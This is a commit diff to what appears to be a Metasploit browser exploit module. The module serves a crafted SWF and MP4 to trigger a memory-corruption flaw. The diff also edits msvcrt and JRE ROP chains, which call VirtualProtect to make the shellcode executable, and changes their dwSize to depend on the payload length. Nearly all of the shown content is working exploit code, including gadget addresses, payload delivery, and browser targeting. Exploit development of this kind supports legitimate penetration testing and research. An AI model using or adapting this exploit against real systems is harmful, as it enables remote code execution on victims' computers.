Dynamic VirtualProtect dwSize. Change output style.
This commit is contained in:
parent
de888e50f0
commit
25a1552fbd
|
@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Both ROP chains generated by mona.py - See corelan.be
|
# Both ROP chains generated by mona.py - See corelan.be
|
||||||
case t['Rop']
|
case t['Rop']
|
||||||
when :msvcrt
|
when :msvcrt
|
||||||
print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||||
|
exec_size = code.length
|
||||||
rop =
|
rop =
|
||||||
[
|
[
|
||||||
0x77c4e392, # POP EAX # RETN
|
0x77c4e392, # POP EAX # RETN
|
||||||
|
@ -146,24 +147,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
0x77c4ec00, # POP EBP # RETN
|
0x77c4ec00, # POP EBP # RETN
|
||||||
0x77c35459, # ptr to 'push esp # ret'
|
0x77c35459, # ptr to 'push esp # ret'
|
||||||
0x77c47705, # POP EBX # RETN
|
0x77c47705, # POP EBX # RETN
|
||||||
0x00000800, # <- change size to mark as executable if needed (-> ebx)
|
exec_size, # EBX
|
||||||
0x77c3ea01, # POP ECX # RETN
|
0x77c3ea01, # POP ECX # RETN
|
||||||
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
||||||
0x77c46100, # POP EDI # RETN
|
0x77c46100, # POP EDI # RETN
|
||||||
0x77c46101, # ROP NOP (-> edi)
|
0x77c46101, # ROP NOP (-> edi)
|
||||||
0x77c4d680, # POP EDX # RETN
|
0x77c4d680, # POP EDX # RETN
|
||||||
0x00000040, # newProtect (0x40) (-> edx)
|
0x00000040, # newProtect (0x40) (-> edx)
|
||||||
0x77c4e392, # POP EAX # RETN
|
0x77c4e392, # POP EAX # RETN
|
||||||
nop, # NOPS (-> eax)
|
nop, # NOPS (-> eax)
|
||||||
0x77c12df9, # PUSHAD # RETN
|
0x77c12df9, # PUSHAD # RETN
|
||||||
].pack("V*")
|
].pack("V*")
|
||||||
|
|
||||||
when :jre
|
when :jre
|
||||||
print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||||
|
exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
|
||||||
rop =
|
rop =
|
||||||
[
|
[
|
||||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
exec_size, # Value to negate, will become 0x00000201 (dwSize)
|
||||||
0x7c347f98, # RETN (ROP NOP)
|
0x7c347f98, # RETN (ROP NOP)
|
||||||
0x7c3415a2, # JMP [EAX]
|
0x7c3415a2, # JMP [EAX]
|
||||||
0xffffffff,
|
0xffffffff,
|
||||||
|
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||||
if my_target.nil?
|
if my_target.nil?
|
||||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||||
send_not_found(cli)
|
send_not_found(cli)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||||
|
|
||||||
# The SWF requests our MP4 trigger
|
# The SWF requests our MP4 trigger
|
||||||
if request.uri =~ /\.mp4$/
|
if request.uri =~ /\.mp4$/
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||||
mp4 = create_mp4(my_target)
|
mp4 = create_mp4(my_target)
|
||||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
if request.uri =~ /\.swf$/
|
if request.uri =~ /\.swf$/
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
||||||
end
|
end
|
||||||
|
|
||||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue